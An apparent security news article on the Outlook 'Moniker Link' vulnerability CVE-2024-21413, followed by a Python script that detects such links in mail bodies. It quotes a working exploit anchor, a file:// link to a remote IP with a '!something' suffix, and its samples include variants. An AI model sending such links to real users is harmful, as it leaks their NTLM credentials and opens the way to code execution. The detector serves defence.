
The warning refers to the CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability discovered last year by Check Point Research experts. The bug affects a number of Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
The security hole results in remote code execution when an e-mail with malicious links is opened using a vulnerable version of Microsoft Outlook. Successful exploitation of this vulnerability enables an attacker to bypass the Office Protected View and open malicious Office files in edit mode.
Such attacks can result in the leaking of local NTLM credentials and remote code execution (RCE).
Importantly, the Preview Pane can also be used as an attack vector since CVE-2024-21413 can be exploited when malicious documents are previewed.
The vulnerability, dubbed Moniker Link by Check Point Research analysts, makes it possible to bypass Outlook protection against malicious links embedded in emails by using the file:// construct. All the attacker has to do is add a ! character to the URL that points to an attacker-controlled server.
The exclamation mark is added immediately after the document extension along with arbitrary text (Check Point Research used the word “something” in its example):
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Such a link bypasses Outlook restrictions, and Outlook accesses the remote resource the link points to when the link is clicked. Importantly, no warnings or errors are displayed.
According to the experts, the vulnerability is related to the MkParseDisplayName API and can affect other software that uses it.
As CISA reports, the security hole is actively exploited and has been added to the Known Exploited Vulnerabilities (KEV) catalog.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” – CISA.
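A defensive check for the link shape described above, as an added example that is not code from Check Point Research, Microsoft or CISA: it scans an HTML mail body for file: hrefs that carry a "!" suffix right after a file extension. The function name, the regex and the sample body are assumptions of this example; the first sample link is the one quoted above, the rest are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Shape from the article: file: scheme, slashes/backslashes, a remote host,
# a path ending in a file extension, then "!" followed by arbitrary text.
MONIKER_RE = re.compile(
    r"^file:[/\\]+(?P<host>[^/\\!]+)[/\\](?P<path>[^!]*\.[A-Za-z0-9]{1,8})!(?P<suffix>.*)$",
    re.IGNORECASE,
)

class _HrefCollector(HTMLParser):
    """Collects the href value of every <a> tag in a mail body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)

def find_moniker_links(html_body):
    """Return one dict per href that matches the file://...ext!text shape."""
    collector = _HrefCollector()
    collector.feed(html_body)
    hits = []
    for href in collector.hrefs:
        candidate = unquote(href.strip())  # also catches "!" written as %21
        m = MONIKER_RE.match(candidate)
        if m:
            hits.append({"href": href, "host": m["host"],
                         "path": m["path"], "suffix": m["suffix"]})
    return hits

# Sample body: first link is the article's example, the others are constructed.
SAMPLE = r"""
<p><a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a></p>
<p><a href="file://10.10.111.111/test/test.rtf%21x">encoded variant</a></p>
<p><a href="https://example.com/report.rtf!note">ordinary web link</a></p>
<p><a href="file:///C:/docs/report.docx">local file, no suffix</a></p>
"""

if __name__ == "__main__":
    for hit in find_moniker_links(SAMPLE):
        print("suspicious link:", hit["href"], "-> host", hit["host"])
```

A hit is a reason to quarantine or strip the link at the mail gateway; it does not replace installing the Office update.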
